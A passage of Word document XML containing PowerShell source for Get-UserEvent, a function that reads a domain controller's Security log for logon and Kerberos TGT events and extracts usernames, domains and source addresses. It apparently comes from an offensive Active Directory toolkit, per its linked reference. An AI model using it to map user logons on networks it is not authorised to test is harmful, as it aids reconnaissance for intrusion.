        <w:t xml:space="preserve">        Either 'logon', 'tgt', or 'all'. Defaults: 'logon'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110026E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E39FBDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DateStart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21805F8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54DE46EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Filter out all events before this date. Default: 5 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E535CAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F16E7E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB9CC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A495A0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B107891" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE3655" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AA724AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09372432" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="237444BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-UserEvent -ComputerName DomainController.testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7DF7CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="019857F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C72F55F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="713C0D29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D1C66C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B5DFB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D538DED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297883E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6927B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50252F15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = $Env:ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C1AC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="42EC68E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02818EF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateSet("logon","tgt","all")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F561E74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $EventType = "logon",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DB0CA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F8047B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [DateTime]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174C1F69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DateStart = [DateTime]::Today.AddDays(-5),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DB025" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B3B73B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D28852" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C49A04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E555855" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B2A764A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($EventType.ToLower() -like "logon") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2708E4AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int32[]]$ID = @(4624)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B399AFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFBA318" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif($EventType.ToLower() -like "tgt") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC98A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int32[]]$ID = @(4768)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6801DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501BC5DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54827591" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int32[]]$ID = @(4624, 4768)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE5240D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4E18A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="206D244E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16168E85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Using alternative credentials"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A66310C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Arguments = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D74840F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'ComputerName' = $ComputerName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FB001A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Credential' = $Credential;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3FB850" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'FilterHashTable' = @{ LogName = 'Security'; ID=$ID; StartTime=$DateStart};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408ED138" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'ErrorAction' = 'SilentlyContinue';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD2A6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2851BD0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CE04DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149DA97E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Arguments = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7C0F60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            'ComputerName' = $ComputerName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5566D673" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'FilterHashTable' = @{ LogName = 'Security'; ID=$ID; StartTime=$DateStart};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653DEE4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'ErrorAction' = 'SilentlyContinue';            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB7809" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B689B01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070F55E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="725E240D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # grab all events matching our filter for the specified host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2099F0F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Get-WinEvent @Arguments | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBE49D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B2283BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ID -contains 4624) {    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36248E9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # first parse and check the logon event type. This could be later adapted and tested for RDP logons (type 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337F727A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($_.message -match '(?s)(?&lt;=Logon Type:).*?(?=(Impersonation Level:|New Logon:))') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B578591" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Matches) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ABDDF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $LogonType = $Matches[0].trim()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076E77B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Matches = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F26E8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768832B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DD331" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476BFACF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $LogonType = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1481A248" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3B57C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BA37344" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # interactive logons or domain logons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6889C8D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if (($LogonType -eq 2) -or ($LogonType -eq 3)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EB222C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8AB6B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # parse and store the account used and the address they came from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F93CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($_.message -match '(?s)(?&lt;=New Logon:).*?(?=Process Information:)') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A25B75F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($Matches) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F8B58B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $UserName = $Matches[0].split("`n")[2].split(":")[1].trim()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37595CE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            $Domain = $Matches[0].split("`n")[3].split(":")[1].trim()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4DE7BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Matches = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BFB44C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A748679" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1357B902" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($_.message -match '(?s)(?&lt;=Network Information:).*?(?=Source Port:)') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27614E88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($Matches) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0E71D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Address = $Matches[0].split("`n")[2].split(":")[1].trim()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543285BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Matches = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141CA27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F504DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C8BC86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14F52E88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # only add if there was account information not for a machine or anonymous logon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D06E6AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if ($UserName -and (-not $UserName.endsWith('$')) -and ($UserName -ne 'ANONYMOUS LOGON')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCC81CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $LogonEventProperties = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9C27C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            'Domain' = $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DADFD3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            'ComputerName' = $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D8FD1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            'Username' = $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D72B685" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            'Address' = $Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D0F19E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            'ID' = '4624'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED22A6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            'LogonType' = $LogonType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB2138E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            'Time' = $_.TimeCreated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA4E968" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9B04D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        New-Object -TypeName PSObject -Property $LogonEventProperties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781464B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4168D9C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E77C012" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03105A65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "Error parsing event logs: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25687EE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D83B55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66690232" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65861B98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ID -contains 4768) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DD717B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # the TGT event type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E575EAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D77794" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($_.message -match '(?s)(?&lt;=Account Information:).*?(?=Service Information:)') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1317C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Matches) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0082CFF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Username = $Matches[0].split("`n")[1].split(":")[1].trim()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3570AE1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Domain = $Matches[0].split("`n")[2].split(":")[1].trim()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED46CA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Matches = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7658E0A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAEC03B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D116A61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="102AE801" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($_.message -match '(?s)(?&lt;=Network Information:).*?(?=Additional Information:)') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59131CE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Matches) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D484F50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Address = $Matches[0].split("`n")[1].split(":")[-1].trim()</w:t>
      </w:r>
    </w:p>
